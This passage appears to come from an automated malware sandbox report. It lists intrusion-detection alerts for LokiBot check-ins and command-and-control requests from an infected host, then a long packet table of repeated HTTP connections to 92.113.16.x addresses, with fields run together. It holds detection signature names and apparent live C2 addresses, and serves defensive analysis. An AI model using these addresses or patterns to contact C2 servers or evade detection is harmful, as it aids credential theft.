                                  2024-12-22T14:13:50.975180+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997092.113.16.6780TCP
                                  2024-12-22T14:13:52.558386+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997092.113.16.6780TCP
                                  2024-12-22T14:13:52.558386+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54997092.113.16.6780TCP
                                  2024-12-22T14:13:52.942630+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997692.113.16.6780TCP
                                  2024-12-22T14:13:52.942630+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997692.113.16.6780TCP
                                  2024-12-22T14:13:52.942630+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997692.113.16.6780TCP
                                  2024-12-22T14:13:54.532204+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997692.113.16.6780TCP
                                  2024-12-22T14:13:54.532204+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54997692.113.16.6780TCP
                                  2024-12-22T14:13:55.208169+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998292.113.16.6780TCP
                                  2024-12-22T14:13:55.208169+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998292.113.16.6780TCP
                                  2024-12-22T14:13:55.208169+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998292.113.16.6780TCP
                                  2024-12-22T14:13:56.719927+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998292.113.16.6780TCP
                                  2024-12-22T14:13:56.719927+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54998292.113.16.6780TCP
                                  2024-12-22T14:13:57.115154+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998892.113.16.6780TCP
                                  2024-12-22T14:13:57.115154+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998892.113.16.6780TCP
                                  2024-12-22T14:13:57.115154+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998892.113.16.6780TCP
                                  2024-12-22T14:13:58.701138+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998892.113.16.6780TCP
                                  2024-12-22T14:13:58.701138+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54998892.113.16.6780TCP
                                  2024-12-22T14:13:59.078913+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54999392.113.16.6780TCP
                                  2024-12-22T14:13:59.078913+01002025381ET MALWARE LokiBot Checkin1192.168.2.54999392.113.16.6780TCP
                                  2024-12-22T14:13:59.078913+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54999392.113.16.6780TCP
                                  2024-12-22T14:14:00.640245+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54999392.113.16.6780TCP
                                  2024-12-22T14:14:00.640245+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54999392.113.16.6780TCP
                                  2024-12-22T14:14:01.034852+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54999892.113.16.6780TCP
                                  2024-12-22T14:14:01.034852+01002025381ET MALWARE LokiBot Checkin1192.168.2.54999892.113.16.6780TCP
                                  2024-12-22T14:14:01.034852+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54999892.113.16.6780TCP
                                  2024-12-22T14:14:02.599810+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54999892.113.16.6780TCP
                                  2024-12-22T14:14:02.599810+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54999892.113.16.6780TCP
                                  2024-12-22T14:14:02.984416+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55000292.113.16.6780TCP
                                  2024-12-22T14:14:02.984416+01002025381ET MALWARE LokiBot Checkin1192.168.2.55000292.113.16.6780TCP
                                  2024-12-22T14:14:02.984416+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55000292.113.16.6780TCP
                                  2024-12-22T14:14:04.589436+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55000292.113.16.6780TCP
                                  2024-12-22T14:14:04.589436+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55000292.113.16.6780TCP
                                  2024-12-22T14:14:04.984506+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55000892.113.16.6780TCP
                                  2024-12-22T14:14:04.984506+01002025381ET MALWARE LokiBot Checkin1192.168.2.55000892.113.16.6780TCP
                                  2024-12-22T14:14:04.984506+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55000892.113.16.6780TCP
                                  2024-12-22T14:14:06.546732+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55000892.113.16.6780TCP
                                  2024-12-22T14:14:06.546732+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55000892.113.16.6780TCP
                                  2024-12-22T14:14:07.223056+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55001492.113.16.6780TCP
                                  2024-12-22T14:14:07.223056+01002025381ET MALWARE LokiBot Checkin1192.168.2.55001492.113.16.6780TCP
                                  2024-12-22T14:14:07.223056+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55001492.113.16.6780TCP
                                  2024-12-22T14:14:08.782719+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55001492.113.16.6780TCP
                                  2024-12-22T14:14:08.782719+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55001492.113.16.6780TCP
                                  2024-12-22T14:14:09.389083+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002092.113.16.6780TCP
                                  2024-12-22T14:14:09.389083+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002092.113.16.6780TCP
                                  2024-12-22T14:14:09.389083+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002092.113.16.6780TCP
                                  2024-12-22T14:14:10.859231+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002092.113.16.6780TCP
                                  2024-12-22T14:14:10.859231+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002092.113.16.6780TCP
                                  2024-12-22T14:14:11.258701+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002692.113.16.6780TCP
                                  2024-12-22T14:14:11.258701+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002692.113.16.6780TCP
                                  2024-12-22T14:14:11.258701+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002692.113.16.6780TCP
                                  2024-12-22T14:14:12.817010+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002692.113.16.6780TCP
                                  2024-12-22T14:14:12.817010+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002692.113.16.6780TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 22, 2024 14:12:08.435492992 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:08.555077076 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:08.555202007 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:08.559772968 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:08.679373026 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:08.679462910 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:08.799133062 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.261677980 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.261718035 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.261797905 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.261862040 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.262125969 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.262185097 CET4970480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.381352901 CET804970492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.389081001 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.508769989 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.509057045 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.511244059 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.630817890 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:10.630928040 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:10.751013041 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.114064932 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.114135027 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.114165068 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.114201069 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.114294052 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.114294052 CET4970580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.233845949 CET804970592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.296338081 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.416040897 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.416141987 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.435524940 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.555088997 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:12.555175066 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:12.674885988 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.101917028 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.101949930 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.102015018 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.102070093 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.102380991 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.102441072 CET4970680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.221688032 CET804970692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.244821072 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.364500046 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.364583969 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.366694927 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.486254930 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:14.486390114 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:14.606132984 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.123626947 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.123687983 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.123769045 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.123873949 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.124115944 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.124181032 CET4970780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.243396044 CET804970792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.265212059 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.384891987 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.384993076 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.387166023 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.506761074 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:16.506905079 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:16.626540899 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.089358091 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.089935064 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.089968920 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.090018034 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.090033054 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.090065956 CET4970980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.209613085 CET804970992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.248516083 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.368067980 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.368158102 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.370491982 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.490109921 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:18.490175009 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:18.609813929 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.071649075 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.071729898 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.071763039 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.071784019 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.071818113 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.071871042 CET4971580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.191394091 CET804971592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.212661982 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.332220078 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.332326889 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.334520102 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.454189062 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:20.454277039 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:20.573832035 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.015083075 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.015151024 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.015160084 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.015202999 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.015225887 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.015280962 CET4971680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.134922981 CET804971692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.171838045 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.291589975 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.291675091 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.293869972 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.413321972 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:22.413384914 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:22.532871962 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:23.904112101 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:23.904187918 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:23.904362917 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:23.904515982 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:23.904787064 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:23.904875994 CET4972380192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:24.024035931 CET804972392.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:24.054544926 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:24.174240112 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:24.176794052 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:24.178985119 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:24.298444033 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:24.298559904 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:24.418102980 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:25.864224911 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:25.864240885 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:25.864301920 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:25.864432096 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:25.864658117 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:25.864710093 CET4973080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:25.984136105 CET804973092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:26.023458958 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:26.143085957 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:26.143170118 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:26.145272970 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:26.264966011 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:26.270737886 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:26.390292883 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:27.824202061 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:27.824429989 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:27.824444056 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:27.824506044 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:27.824579954 CET4973780192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:27.943995953 CET804973792.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:27.964232922 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:28.083849907 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:28.083956003 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:28.086251020 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:28.206069946 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:28.206248999 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:28.325855970 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:29.795475960 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:29.795531988 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:29.795604944 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:29.795763969 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:29.795816898 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:29.800345898 CET4974480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:29.919965982 CET804974492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:29.951252937 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:30.070713997 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:30.070810080 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:30.074321985 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:30.193922043 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:30.193985939 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:30.313445091 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:31.769417048 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:31.769454002 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:31.769591093 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:31.769591093 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:31.770176888 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:31.770246983 CET4975080192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:31.889348030 CET804975092.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:31.929296970 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:32.048882008 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:32.048958063 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:32.051146984 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:32.170720100 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:32.170808077 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:32.290321112 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.666448116 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.666508913 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.666517973 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.666583061 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:33.666616917 CET4975680192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:33.786087990 CET804975692.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.805016994 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:33.924527884 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:33.926841021 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:33.928828955 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:34.048327923 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:34.048387051 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:34.167908907 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.539851904 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.539885998 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.540018082 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.540016890 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.540016890 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.540102005 CET4976280192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.659689903 CET804976292.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.736078024 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.855546951 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.855619907 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.857846975 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:35.977278948 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:35.977484941 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:36.097116947 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.539196014 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.539438009 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.539486885 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.539525986 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.539725065 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.539774895 CET4976880192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.659069061 CET804976892.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.681238890 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.800736904 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.800929070 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.802879095 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:37.922418118 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:37.922549009 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:38.242805004 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:38.362476110 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:38.378983021 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.530751944 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.530806065 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.530868053 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.530925035 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.531112909 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.531172991 CET4977180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.650433064 CET804977192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.670600891 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.790630102 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.790801048 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.794246912 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:39.913726091 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:39.913796902 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:40.227108955 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:40.529905081 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:40.530567884 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.400176048 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.400341988 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.400417089 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.400466919 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.400655985 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.400721073 CET4977480192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.520040989 CET804977492.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.551580906 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.671073914 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.671159029 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.673158884 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.792772055 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:41.792851925 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:41.912472963 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.380470037 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.380490065 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.380559921 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.380647898 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.380718946 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.380853891 CET4977980192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.500526905 CET804977992.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.531568050 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.651027918 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.654782057 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.656884909 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.776478052 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:43.778744936 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:43.898452997 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.336585045 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.336741924 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.336914062 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.336914062 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.337224007 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.337296009 CET4978580192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.456583977 CET804978592.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.483233929 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.602961063 CET804979192.113.16.63192.168.2.5
                                  Dec 22, 2024 14:12:45.603246927 CET4979180192.168.2.592.113.16.63
                                  Dec 22, 2024 14:12:45.605190039 CET4979180192.168.2.592.113.16.63
